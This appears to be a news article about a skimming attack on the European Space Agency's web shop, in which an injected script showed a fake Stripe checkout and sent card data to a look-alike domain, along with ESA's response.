Threat actors have hacked the legitimate website of the European Space Agency after loading a piece of JavaScript code that generated a false Stripe payment page at checkout.
The hack could inflict significant damage, as the affected entity has over ten billion euros in budget. ESA aims to push the boundaries of space operations by educating people and developing rockets and satellites to study the cosmos.
As of now, the agency’s authorised web store is offline, with the statement “temporarily out of orbit.”
The hack on the European Space Agency website compromised its financial information.
According to reports, the hackers that targeted the European Space Agency website used a malicious script and collected consumer information, such as payment card information entered by customers at the end of a purchase.
Researchers allegedly discovered the dangerous script earlier this week and warned that the store appears to be integrated with ESA systems, which could endanger the agency’s employees.
In addition, the investigation noticed that the domain for exfiltrating the information shares the same name as the actual store selling ESA items but has a different top-level domain.
This tactic could be apparent as the hackers use the same name.pics TLD (i.e. esaspaceshop[.]pics) while the European agency’s official shop uses the “esaspaceshop” in the.com TLD. The software also used obfuscated HTML code from the Stripe SDK to load a bogus Stripe payment page when clients attempt to finish a transaction for the payment.
Furthermore, it is worth noting that the phoney Stripe page did not appear odd or harmless since the legitimate ESA web store supported it. A separate researcher claimed that the webshop no longer showed the fake Stripe payment page, but the script remained accessible in the site’s source code.
On the other hand, ESA stated that the store is not hosted on its infrastructure and that the agency does not administer the data since it does not control it. Still, potentially impacted individuals should check their transaction history or recent activities so they can immediately report problems.